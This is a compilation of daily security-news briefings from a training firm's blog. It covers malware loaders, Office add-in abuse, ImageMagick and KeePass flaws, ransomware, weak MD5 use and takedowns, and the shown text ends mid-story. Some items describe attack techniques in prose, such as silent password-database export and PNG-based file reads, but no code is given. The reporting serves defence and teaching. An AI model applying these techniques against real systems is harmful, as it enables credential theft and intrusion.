Les Bell and Associates Pty Ltd
Site blog
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Google Search Returns Malicious Loaders for Malware Attacks
Researchers at SentinelLabs have identified a series of virtualized .NET malware loaders which are being distributed via malicious ads placed through Google and displayed in search results. The researchers encounter these loaders while investigating malvertising attacks; all that was required was a simple Google search for "Blender 3D" and the ads were returned.
The loaders are implemented in .NET and use vitualization, based on the KoiVM virtualizing protector, to obfuscate their implementation and execution. Although SentinelLabs dubbed these loaders MalVirt, it seems likely that they are related to the KoiVM loader detected a few months ago by K7 Security Labs. The MalVirt malware applies an unusual level of anti-analysis and anti-detection techniques to its payloads, which include a feature-rich infostealer from the Formbook family that is capable of keylogging, screenshot theft, theft of web and other credentials and staging of other malware.
The Formbook malware is more commonly delivered as malmail attachments; switching to malverts is a response to the default blocking of MS Office VBA (Visual Basic for Applications) macros. While popular with criminal groups, it has also been used by state-affiliated groups, as reported by Ukraine's CERT.
Milenkoski, Aleksandar and Tom Hegel, MalVirt | .NET Virtualization Thrives in Malvertising Attacks, blog post, 2 Februart 2023. Available online at https://www.sentinelone.com/labs/malvirt-net-virtualization-thrives-in-malvertising-attacks/.
Threat Actors Use Visual Studio Tools for Office to Deploy Malware
There are many other responses to Microsoft's default blocking of VBA macros: wrapping them in .ZIP and similar archives, or even .ISO images, so that the wrapper would carry the Mark of the Web, but the macro would not, or using shortcut (.LNK) files. Now, Deep Instinct researchers have uncovered a new technique: using Microsoft's Visual Studio Tools for Office (VSTO) to develop Office Add-Ins.
VSTO allows these Office application extensions to be written using .NET, and also enables the creation of Office documents which will deliver and execute them. Even better, an Office Add-In can be associated with a specific Office application and once it is installed, the Add-In will load and execute every time that application is launched - no need for persistance workarounds like creating scheduled tasks!
A VSTO Add-In can be packaged along with the Office document used to run it, but can also be fetched from a remote host when the document is opened. The latter technique is more difficult for the attacker; they would have to sign the Add-In using a trusted certificate, for example. The Deep Instinct researchers provide a proof-of-concept which can deliver a Meterpreter payload.
Vilkomir-Preisman, Shaul, No Macro? No Worries. VSTO Being Weaponized by Threat Actors, blog post, 2 February 2023. Available online at https://www.deepinstinct.com/blog/no-macro-no-worries-vsto-being-weaponized-by-threat-actors.
Traffic Light Control Software Vulnerable; Could Cause Gridlock
Last week's eight industrial control systems advisories from the Cybersecurity & Infrastructure Security Agency were mostly routine, but one has caused more than the usual level of activity, largely because of the (lack of) response from the vendor concerned. According to a report in The Stack, Econolite's traffic light controller software carries a critical vulnerability (CVE-2023-0452) with a CVSS score of 9.8. The vulnerability relates to CWE-328: Use of Weak Hash, and - you guessed it - it's our old friend MD5 again, turning where it shouldn't: an authentication subsystem. In fact, this can lead to unauthenticated access to a configuration file.
According to the report, the Econolite software is used by over 400 agencies to control lights at over 57,000 intersections, although not all are Internet-accessible. Even with access, an attacker can really only adjust the timing on the lights, prioritizing traffic in one direction and causing long tailbacks in the other; fortunately it is apparently not possible to turn all lights green simultaneously.
The biggest concern, however, is that Econolite has not responded in any way to the CISA advisory and has not released a patch for the problem, unlike the firms behind the other seven vulnerabilities of the week.
Targett, Ed, Critical controller bug could trigger traffic chaos: Software vendor ignores CISA outreach, The Stack, 27 January 2023. Available online at https://thestack.technology/econolite-traffic-controller-vulnerability-cisa-ics/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
ESET Releases APT Activity Report for 2022
Security software and services firm ESET has released its APT Activity Report T3 2022, covering the last three months of the year. The report summarises the campaigns of threat actors affiliated with several states: China, Iran, North Korea and Russia (not that one should imagine for a moment that other countries don't have similar groups).
Not unexpectedly, the primary target of Russian-linked groups was Ukraine, against which they deployed an array of wipers and ransomware - for example, the notorious Sandworm group reappeared, this time with a new wiper targeting the Ukrainian energy sector (always a favourite Russian target in winter - it was also the target of Russian missile attacks this time).
Meanwhile, the Pandas - the China-aligned groups - seemed to shift their focus even more towards Europe, although some groups such as LuckyMouse and MirrorFace are continuing to target the S.E. Asian region, hitting companies in Hong Kong and also running a spearphishing campaign against Japanese political entities. The Iranian groups were more concerned with the Middle East, of course - primarily Israel and Israeli companies' overseas operations.
North Korean APT's are focused on financial rewards, targeting cryptocurrency firms and exchanges - a useful workaround for a country beset by financial sanctions.
The report provides a useful technical overview of the various campaigns with lots of links to more detailed reports, along with lists of targeted countries and regions, as well as industry sectors.
Boutin, Jean-Ian, ESET APT Activity Report T3 2022, blog post, 31 January 2023. Available online at https://www.welivesecurity.com/2023/01/31/eset-apt-activity-report-t3-2022/.
ImageMagick Vulns Lead to DoS, Arbitrary File Disclosure
One of the all-time-great secret tools of command line ninjas is the ImageMagick program suite, which can be used from the command line to convert graphic file formats and resize images without a whole lot of mousing around. The command-line nature of the ImageMagick convert utility means that is often used on web servers to downsize uploaded high-resolution images 'on the fly', so as to not waste bandwidth for viewers who will only see a smaller version on the final page anyway.
Now comes the disclosure of two 0day vulnerabilities discovered by Mexican security firm Metabase Q:
- CVE-2022-44267 - A DoS vulnerability triggered when parsing a PNG image with a filename consisting of a single dash ("-")
- CVE-2022-44268 - An information disclosure vulnerability that could be exploited to read arbitrary files from a server when parsing an image
Like many command-line utiliities, the ImageMagick programs will interpret a filename argument of '-' as a reference to the standard input stream (stdin), rather than an actual file (in *ix systems, files and devices are treated the same way anyway). Since web site image processing is usually based on actual files, there will be no data on stdin, and the process will block, waiting for input. Of course, that will affect only that thread or process, rather than the entire web server or system, but if that '-' was embedded on every page . . .
The second vulnerability could be more severe; it abuses the structure of a PNG file to get ImageMagick to read and incorporate an arbitrary file into the output image. Metabase Q's proof-of-concept, for example, retrieves the content of /etc/passwd, which could conceivably enumerate some user and system accounts, although it would have to be a really old system to contain password hashes. But other files, some considerably more sensitive, could be retrieved this way.
The vulnerabilities exist in ImageMagick versions up to and including 7.1.0-49; they were fixed in version 7.1.0-52, which was released in November 2022 and should have percolated through repositories by now and have been updated by switched-on site admins. I'll still be using my updated ImageMagick.
Gonzales, Bryan, ImageMagick: The hidden vulnerability behind your online images, blog post, undated. Available online at https://www.metabaseq.com/imagemagick-zero-days/.
Google Expands Fuzzer Reward Program
Since 2017, Google has run an OSS-Fuzz Reward Program to encourage the use of fuzz testing in the open source community. Lest you think this is an obscure little corner of software testing, let me point out there is money in it: the OSS-Fuzz Reward Program has awarded over $US600,000 to over 65 different contributors for their assistance.
Now, Google has announced many new types of rewards which expand the scope of the program, covering contributions such as integration of new sanitizers to find new vulnerabilities, notable FuzzBench integrations, and project fuzzing coverage increase. The total possible rewards for a project integration has increased by 50% to $US30,000, depending on the criticality of the project.
The firm has also continued to add new language support and tools to the OpenSSF FuzzIntrospector tool, which was integrated into OSS-Fuzz last year.
Chang, Oliver, Taking the next step: OSS-Fuzz in 2023, blog post, 1 February 2022. Available online at https://security.googleblog.com/2023/02/taking-next-step-oss-fuzz-in-2023.html.
OpenAI Escalates Arms Race With Itself
Your humble scribe counts himself lucky to have retired from academia just as artificial intelligence tools like ChatGPT have made it possible for students to submit realistic essays that were not written by the student himself (nor by a for-hire essay-writing service). Detecting automated plagiarism of this kind can be quite tricky; those who have played with ChatGPT - which must be all of us, by now - know that its output reads easily, although a sequence of conversations will reveal a certain underlying structure that never varies.
The main drawback of ChatGPT is the fact that it was pre-trained in 2021 and is not aware of developments since then. It also has a nasty characteristic that is a dead giveaway: it will cite non-existent papers and will confess, when pushed, that it lied. Given time, though, both of these will be overcome. But even in the meantime, it will take a human marker far longer to investigate possible plagiarism than a student would do in creating it. How, then, to detect AI-written submissions?
OpenAI to the rescue! The firm has, inevitably, trained a classifier to distinguish between human-written and AI-generated text from a variety of providers. It's not very good yet; in testing it accurately categorized 26% of AI-written text as "likely AI-written" but incorrectly categorized 9% of human-written text as being the work of an AI (false positives). However, this represents a significant improvement over the previous classifier.
Of course, the classifier has to be trained on a corpus consisting of pairs of AI- and human-written text on the same topic; something that is expensive to arrange, especially on some topic areas, and could conceivably be gamed to bias the classifier. And reliability will be much lower when applied to topics that the classifier has not been trained on.
It was inevitable that one solution to a problem posed by AI would be AI, even if this puts OpenAI into an arms race with itself. But at least the firm is engaging with educators and others to discuss these problems, via a feedback form and other resources.
Kirchner, Jan Hendrik, Lama Ahmad, Scott Aaronson and Jan Leike, New AI classifier for indicating AI-written text, blog post, 31 January 2023. Available online at https://openai.com/blog/new-ai-classifier-for-indicating-ai-written-text/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
More Baseband Management Controller Vulns Threaten Server Supplies
Last month we wrote about vulnerabilities in the AMI MegaRAC Baseboard Management Controller software, posing a risk to servers from many manufacturers including DELL EMC, HP Enterprise, and Lenovo. Now security firm Eclypsium, who found and disclosed three vulnerabilities, has updated its advisory to add two new vulnerabilities which it had not disclosed, in order to allow AMI to develop mitigations.
The new vulnerabilities are:
- CVE-2022-26872 (CVSS score: 8.3) - Password reset interception via API
- CVE-2022-40258 (CVSS score: 5.3) - Weak password hashes for Redfish and API
The AMI security advisory is somewhat uninformative, but NVD classifies the first vulnerability as a weak password recovery mechanism for forgotten passwords, while the second seems to relate to the use of weak hashing algorithms - specifically, MD5 with a single global salt. Customers should check with their server vendors to see whether they have released an update to address these issues - several already have.
Babkin, Vlad, Supply Chain Vulnerabilities Put Server Ecosystem at Risk, blog post, 5 December 2022. Available online at https://eclypsium.com/2022/12/05/supply-chain-vulnerabilities-put-server-ecosystem-at-risk/.
VBA Macros Install Monero Cryptominer
A new report from Fortiguard Labs researcher Xiaopeng Zhang explains how an unidentified threat actor is using malicious Visual Basic for Applications (VBA) macros to install the ever-popular XMRig cryptominer, hijacking the victim's computer to mine Monero cryptocurrency.
Three different Excel documents were discovered, each of which carries a VBA project which, when the spreadsheet is opened, will cause Excel to pop up the usual security warning about macros having been disabled. Of course, we all know what many users will do in response to this: they will click the "Enable Content" button. The spreadsheet in fact encourages this through a nice trick: it displays a blurred graphic, tricking the user into thinking the image will clear if the content is enabled.
Once the VBA code is running, it downloads a binary executable from a C2 server, saving it to the system Templates folder and renaming it before executing it. Like the VBA code itself, this binary is obfuscated, but deobfuscation reveals it to be a .Net executable which, in turn, carries a gzip-compressed .Net DLL. This is extracted in memory and then loaded, before being executed. This code is also extensively obfuscated and also contains functions to detect tampering at runtime, making it very difficult to analyse, but the code is a malware loader and installer, with the payload in the .Net module.
The next stage is to gain persistence, which is done by create a task in TaskScheduler, before loading and decoding its configuration block and initiating communication with the C2 server. After uploading information gathered from the victim system - CPU type, current user name, etc. - the malware receives commands, typically to download further files from Microsodt OneDrive. The first of these is used to perform process hollowing, replacing the code of an innocuous-looking AddInProcess.exe with the content of the second, which is the xmrig.exe cryptominer.
It is a long and convoluted process, most of which is intended to obscure the nature of the attack and prevent analysis.
Zhang, Xiaopeng, Analyzing Malware Code that Cryptojacks System to Mine for Monero Crypto, blog post, 31 January 2023. Available online at https://www.fortinet.com/blog/threat-research/malicious-code-cryptojacks-device-to-mine-for-monero-crypto.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
KeePass Vulnerability Allows Plaintext Export of Entire Password Database
Many security professionals use the KeePass open-source password manager - it is free, lightweight and versatile, while not exposing a large attack surface. However, a newly-revealed vulnerability (CVE-2023-24055) suggests that some caution might be necessary, at least until a fix or workaround appears.
KeePass is configured by the KeePass.config.xml file in the program directory. If an attacker can edit this file, they can add a trigger which will export the password database when it is initially opened, without the user being asked to confirm this - it will happen invisibly in the background. The view of the KeePass developers is that if an attacker has that level of access to the machine, it is game over already - but our view is that this represents a significant privilege escalation which will gain the attacker access to many other systems.
One suggestion is to use "Tools" -> "Options" -> "Policy" and then deselect "Export - No Key Repeat", but the same argument makes this suggestion moot: an attacker who has that level of access to the machine can disable that setting and execute the attack. Perhaps the best approach for the time being, especially for those who must allow others access to a shared system, is to run the Portable version of KeePass off a USB key. A write-protected KeePass.config.enforced.xml file is another option. But in all these cases, a sophisticated attack can bypass these measures.
With PoC code now available, expect a KeePass database export feature to be added to many infostealers.
Chris, If an attacker modifies the xml config file . . ., discussion thread, 28 December 2022. Available online at https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/.
QNAP Pushes Update to Fix SQL Injection Remote Code Execution Vulnerability
NAS vendor QNAP has warned customers to update their devices' firmware in order to fix a critical remote code execution vulnerability (CVE-2022-27596). The vulnerability, which has a CVSS 3.1 score of 9.8, seems to relate to improper sanitization of special elements in SQL (CWE-89).
Users are urged to update to QTS 5.0.1.2234 build 20221201 or later (5.0.1.2248 seems to be current) or QuTS hero h5.0.1.2248 build 20221215 or later. Most users who have automatic firmware update checks enabled and log in to their devices regularly will already have updated, so this is mainly a reminder for those who let the months go by, lulled into a tranquil state by the reliability of NAS devices in typical SME settings.
Uncredited, Vulnerability in QTS and QuTS hero, security advisory, 30 January 2023. Available online at https://www.qnap.com/en/security-advisory/qsa-23-01.
Microsoft Reminds Sleepy Exchange Admins: Patch!
In a similar vein, Microsoft's Exchange Team has blogged, reminding admins that it is critical to keep Exchange servers updated; this shouldn't really be necessary, as Exchange has proved to be fertile ground for attackers in recent years - remember ProxyShell, ProxyNotShell, ProxyOracle and all the rest? - and Exchange admins really ought to be in a permanently paranoid and jittery state.
As Redmond's reminder points out, this means installing the latest available Cumulative Update (CU) and Security Update (SU) on all Exchange servers as well as on Exchange Management Tools workstations. The problem is that email access is so critical in an always-connected, 24 x 7 x 52 world that admins find it hard to schedule even brief downtime.
Additional Exchange controls are a good idea, including enabling Windows Extended Protection, which mitigates MitM attacks, as well as enabling certificate signing of PowerShell serialization payloads. Attackers love to use PowerShell in Exchange attacks, especially for exploiting Active Directory. The blog post provides lots of other useful tips.
The Exchange Team, Protect Your Exchange Servers, blog post, 26 January 2023. Available online at https://techcommunity.microsoft.com/t5/exchange-team-blog/protect-your-exchange-servers/ba-p/3726001.
MD5 Lives On To Bite Samba Users
An interesting article by Paul Ducklin for Sophos' Naked Security blog makes a plea for cryptographic agility - the somewhat obvious idea that we must be willing to abandon old cryptoprimitives as the prove weak. This is an especially important notion given the possibility that someone, somewhere - who will never let on that they have it, for obvious reasons - builds a quantum computer that is able to break the most popular public-key cryptoprimitives.
That day does not seem to be upon us quite yet, but older algorithms are vulnerable to attacks using classical computer hardware, especially GPU's, and a leading example is the birthday paradox attack on the older hash algorithms, such as MD5. The complexity of a birthday paradox attack is \(2^{n/2}\) operations, where \(n\) is the length of the digest, in bits.
Now, MD5 produces a 128-bit digest, which means that a birthday paradox attack can be achieved in only \(2^{64}\) - or approximately \(1.85 \times 10^{19}\) - attempts. This might seem like a large number, but it's not - and it can be cut down massively using a technique called a chosen-prefix collision, which works by making slight changes to initially-identical strings to quickly find two different strings which still produce the same digest value. This process takes only seconds.
Some authentication code in Samba is a holdover from the days of Windows 2000, when Microsoft introduced the use of RC4 encryption with an MD5 HMAC (hash-based message authentication code). The vulnerability arises from the use of a single round of MD5 to compute a digest over the data to be authenticated before calculating the HMAC over that; an attacker who knows the plaintext data can create another set of plaintext which will generate the same digest value, and insert that into the data stream without being detected. Somebody probably inserted this extra digest calculation in an attempt to improve authentication security, not realising that it actually weakened the protocol.
Since most systems have this old HMAC-MD5 authentication disabled, it was never detected as a serious problem, but attackers could negotiate the authentication protocol down and make use of this - hence CVE-2022-38023, which was fixed by Microsoft in November last year, and which could allow an attacker to insert malicious packets into the SMB protocol and achieve a privilege escalation attack. The whole sad tale is a lesson that keeping old versions of protocols around for backward compatibility can lead to disaster (which is why it is so important to configure web servers to not allow the older versions of the TLS and SSL protocols).
Ducklin, Paul, Serious Security: The Samba logon bug caused by outdated crypto, blog post, 30 January 2023. Available online at https://nakedsecurity.sophos.com/2023/01/30/serious-security-the-samba-logon-bug-caused-by-outdated-crypto/.
Stevens, Marc, Arjen Lenstra and Benne de Weger, Vulnerability of software
integrity and code signing applications to chosen-prefix collisions for
MD5, web page, 30 November 2007. Available online at https://www.win.tue.nl/hashclash/SoftIntCodeSign/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
We're back! Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
IAPP Report Highlights Challenges for Responsible Use of AI
The latest Privacy and AI Governance Report from the International Association of Privacy Professionals (IAPP) explores the state of artificial intelligence (AI) governance through interviews with stakeholders in the tech, life sciences, telecommunications, banking, staffing and retail industries in North America, Europe and Asia. The interviews focused on where the stakeholders' organizations stood on five areas: governance, risk, processes, tools and skills.
The results show that formulating and deploying clear governance guidelines for the responsible use of AI is a challenging and complex task; the most mature organizations have rolled out responsible practices, but constitute only 20% of organizations surveyed. 10% of responding organizations have not yet formulated responsible AI guidelines, with the remainder in the process of including responsible AI in the governance or 'about to start' doing so.
The use of AI exposes enterprises to a whole new risk landscape. Perhaps the most obvious risk is bias in AI which results in harm to individuals, with consequent fines and judgements. This is further complicated by the changing regulatory environment, which has led to a lack of legal clarity surrounding the use of AI systems.
However, in 80% of organizations, guidelines for ethical use of AI consist only of high-level policy statements and strategic objectives, with no clear plan for how these can be achieved. While some tools do exist for addressing privacy and ethical risks of AI, the selection of these is difficult, as the field is rapidly evolving and lacks robust concepts and definitions.
Koerner, Katharina, and Jake Frazier, Privacy and AI Governance Report, International Association of Privacy Professionals, January 2023. Available online at https://iapp.org/media/pdf/resource_center/privacy_ai_governance_report.pdf.
DOJ Disrupts Hive Ransomware Variant
The US Department of Justice has revealed that, since July 2022, the FBI has penetrated the networks of the Hive ransomware group, captured its decryption keys and offered them to over 1,300 victims worldwide, so that they were spared paying up to $US130 million in ransoms. It also announced that, in coordination with German law enforcement (the German Federal Criminal Police and Reutlingen Police Headquarters-CID Esslingen) and the Netherlands National High Tech Crime Unit, it has seized control of the servers and websites that Hive uses to communicate with its members, disrupting Hive's ability to attack and extort victims.
Like many other ransomware developers, the Hive group offered ransomware-as-a-service (RaaS). The core group maintained the core software as well as the web infrastructure for C2 and payment processing, while recruiting affiliates who would perform initial compromise and deployment in exchange for 80% of the proceeds. The Hive developers also operated the Hive Leak Site, which would publish data exfiltrated from victims who refused to pay the extortion demand.
Uncredited, U.S. Department of Justice Disrupts Hive Ransomware Variant, press release, 26 January 2023. Available online at https://www.justice.gov/opa/pr/us-department-justice-disrupts-hive-ransomware-variant.
Mimic Ransomware Uses Old Conti Code, Everything DLL API
Researchers from Trend Micro have discovered and analysed a new piece of ransomware which is partly based on old code from the Conti ransomware, as well as abusing the API's of a Windows local search engine tool called Everything. The new ransomware, christened Mimic, targets Russian and English-speaking users.
Analysis shows that Mimic is deployed as a dropper which unpacks several files, including a 7zip executable which is used to extract the malware payload from a password-protected archive called Everything64.dll - the genuine Everything search functionality is in Everything32.dll. After extracting its files, it copies them to a random directory under %LocalAppData% and renames the ransomware binary to bestplacetolive.exe.
Mimic seems to be highly capable; it can bypass UAC, disable Windows Defender, prevent system shutdown, prevent itself being killed, disable Windows telemetry, disable sleep mode, terminate multiple applications and services, and delete shadow copies. As it runs, it queries the Everything_SetSearchW() function to selectively match or avoid files for encryption, and it adds a .QUIETPLACE extension to the files that it encrypts.
Trend Micro's report includes suggested mitigations, as well as IoC's.
Morales, Nathaniel, Earle Maui Earnshaw, Don Ovid Ladores, Nick Dai and Nathaniel Gregory Ragasa, New Mimic Ransomware Abuses Everything APIs for its Encryption Process, blog post, 26 January 2023. Available online at https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Software Supply Chain Poisoned By Phishing Campaigns
Research performed jointly by application security testing firm Checkmarx and open-source supply chain security firm Illustria has brought to light a massive campaign which targets naive end users with compromised packages containing links to phishing campaigns. The threat actors behind the campaign, which appears to be highly automated, published over 144,000 packages to the NuGet, NOM and PyPi repositories - the vast majority to NuGet.
The names of the packages mostly relate to hacking, cheats and free resources, for example "free-steam-codes-generator" and "yalla-ludo-diamond-hack". Victims were also promised increased social media followers or likes. The descriptions of all the packages also contained links to phishing sites - perhaps an attempt to increase the SEO ranking of the phishing sites by linking them to legitimate sites like NuGet.
Over 65,000 unique URL's in 90 domains were used to host realistic and well-designed web pages, with some even including fake interactive chatbots that appeared to be delivering the cheats, but generally the victims were asked to perform a 'human verification' process that led them through a maze of sites which asked them social engineering questions, finally redirecting to legitimate ecommerce sites with referral ID's - so that if the victim makes a purchase, the threat actors will earn a commission.
Harush, Jossef, How 140k NuGet, NPM, and PyPi Packages Were Used to Spread Phishing Links, blog post, 14 December 2022. Available online at https://checkmarx.com/blog/how-140k-nuget-npm-and-pypi-packages-were-used-to-spread-phishing-links/.
Microsoft Reclassifies SPNEGO Vuln as Critical - Patch Now
SPNEGO is the Simple and Protected Negotiation Protocol - part of the 'plumbing' that goes around Active Directory, Kerberos and similar authentication protocols to allow negotiation of the security mechanism to be used. In the Windows world, it is used by application protocols like SMB (Server Message Block) and RDP (Remote Desktop Protocol), among others, so select the appropriate authentication mechanism from those supported by a client and a server.
Also in the Windows world, it is the subject of a vulnerability which Microsoft patched back in September. At that point, CVE-2022-37958 was categorised as an invormation disclosure vulnerability. However, IBM X-Force Red Security researcher Valentina Palmiotti discovered that the vulnerability could allow unauthenticated attackers to remotely execute code.
Successful exploitation might require multiple attempts, and so its CVSS 'exploit complexity' rates as High, meaning that with all other categories at the highest level, the overall CVSS score of this vulnerability is 8.1, and Microsoft has reclassified the vulnerability as 'Critical'. In order to give users time to patch, IBM will not release full technical details until at least April 2023.
Thompson, Chris, Critical Remote Code Execution Vulnerability in SPNEGO Extended Negotiation Security Mechanism, IBM Security Intelligence blog, 13 December 2022. Available online at https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/.
GitHub Requires 2FA From March 2023
During 2023 GitHub is going to gradually roll out a requirement for developers to use two factor authentication. Over the year, distinct groups of users will be required to enable 2FA; the gradual rollout will enable GitHub to make adjustments as larger groups are enrolled to 2FA later in the year.
The exact criteria GitHub will use to allocate membership in these groups will not be made public, but broadly the criteria are:
- Users who published GitHub or OAuth apps or packages
- Users who created a release
- Users who are Enterprise and Organization administrators
- Users who contributed code to repositories deemed critical by npm, OpenSSF, PyPI, or RubyGems
- Users who contributed code to the approximate top four million public and private repositories
Users will start receiving reminders 45 days before the 2FA deadline, and will have a week to enroll, after which they will be blocked from accessing GitHub until 2FA is enabled.
Swanson, John, Raising the bar for software security: next steps for GitHub.com 2FA, blog post, 14 December 2022. Available online at https://github.blog/2022-12-14-raising-the-bar-for-software-security-next-steps-for-github-com-2fa/.
Examples of Cloud Credential Abuse
A short article from Palo Alto Networks' Unit 42 provides a couple of examples of how attackers are able to leverage stolen cloud service API credentials to pursue objectives such as phishing, cryptomining and data theft.
Alon, Dror, Compromised Cloud Compute Credentials: Case Studies From the Wild, blog post, 8 December 2022. Available online at https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/.
Saturday Funny
No comment about the dangers of the Internet of Things is required; just see https://twitter.com/vxunderground/status/1603508551569252360. Shodan.io FTW!
Happy Holidays!
This will be the last security news headlines blog post for 2022, as we take a break for the holiday season. We'll be back in January, although we may post before then if there are any major news events. Until then, we wish all readers a happy holidays season!
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Atlassian Products Not Rotating Session Cookies
Just over a week ago, Bangalore-based threat intelligence firm CloudSEK discovered a breach of their systems which led to a small leak of some customer information. At first, their investigations suggested that an employee's Jira password was compromised in order to gain access to Confluence pages. But upon deeper investigation, the details are a bit more concerning.
In fact, the threat actor did gain access to a CloudSEK employee's Jira account, but this was done using Jira session cookies present in stealer logs being sold on the dark web. Further investigation revealed that the session cookies of Atlassian products such as Jira, Confluence and BitBucket are not invalidated, even if the password is changed, even with 2FA enabled, and remain valid for 30 days. They only expire at that time, or if the user logs out before that time. A password change - or other significant changes - should see session cookies rotated, with a new cookie being issued.
The CloudSEK researchers have confirmed that this flaw can take over Jira accounts at hundreds of companies: over a million compromised computers and over 16,000 Jira cookies are currently for sale on dark web marketplaces. The company has released a free tool which lets companies check to see if their accounts are being advertised on dark web marketplaces; they have also notified Atlassian, who have acknowledged the issue and are working to resolve it.
Kulshrestha, Sparsh and Mayank Satnalika, Security Flaw in Atlassian Products (Jira, Confluence,Trello, BitBucket) Affecting Multiple Companies, blog post, 13 December 2022. Available online at https://cloudsek.com/security-flaw-in-atlassian-products-jira-confluencetrello-bitbucket-affecting-multiple-companies/.
Qakbot Smuggles HTML in SVG Images
Your humble scribe fondly remembers the days of 7-bit ASCII email, before the evils of HTML formatting and massive MIME attachments. In particular, the shift to using highly-capable web browsers as email clients (rather than dumb text-only MUA's) opens up a world of possibilities for malicious users, who now have access to sophisticated scripting capabilities, cross-site scripting and other vectors.
However, crude embedding of malicious JavaScript code can easily be detected by network gateways and other security devices, so attackers have developed HTML smuggling techniques, which obfuscate or encode their payloads to evade detection. Cisco Talos researchers recently found a new technique used by the Qakbot banking trojan/stealer, which involves a particularly convoluted unpacking chain to infect the victim's computer.
The malicious email carries an HTML attachment, which in turn contains an SVG (Scalable Vector Graphics) image. SVG images are defined as XML markup tags, which in this case contain embedded HTML <script> tags. These, in turn, contain JavaScript which carries a base64-encoded password-protected ZIP file, which the user is prompted to open with a supplied password. And if the victim falls for this, they will find it unzips to an ISO file which infects their machine.
Once the machine is infected, it will hijack an email thread and propagate itself to still more victims. This may be a long and convoluted process, but it works, and it works well to evade detection by security devices.
Katz, Adam and Jaeson Schultz, HTML smugglers turn to SVG images, blog post, 13 December 2022. Available online at https://blog.talosintelligence.com/html-smugglers-turn-to-svg-images/.
FBI Takes Down 48 DDoS Sites, DoJ Charges Six Defendants
The FBI is now in the process of seizing 48 internet domains associated with web sites offering DDoS-for-hire services, commonly called "booter" services. The web sites had been used to launch millions of attempted - some successful - distributed denial of service attacks worldwide, targeting educational institutions, government agencies, gaming platforms and millions of individual users, disrupting their services and internet connections.
Although the sites claimed to offer "stresser' services, purportedly used for performance-testing networks and servers, the FBI determined that this was simply pretence, and that "thousands of communications between booter site administrators and their customers . . . make clear that both parties are aware that the customer is not attempting to attack their own computers", according to an affidavit filed in support of court-authorised warrants to seize the sites.
At the same time, prosecutors in both Los Angeles and Alaska filed charges against six defendants across the US, who each allegedly offered one-stop DDoS services, with subscriptions of various lengths and attack volumes. In each case, the FBI posed as a customer and was able to conduct test attacks to confirm that the "booter" site functions as advertised.
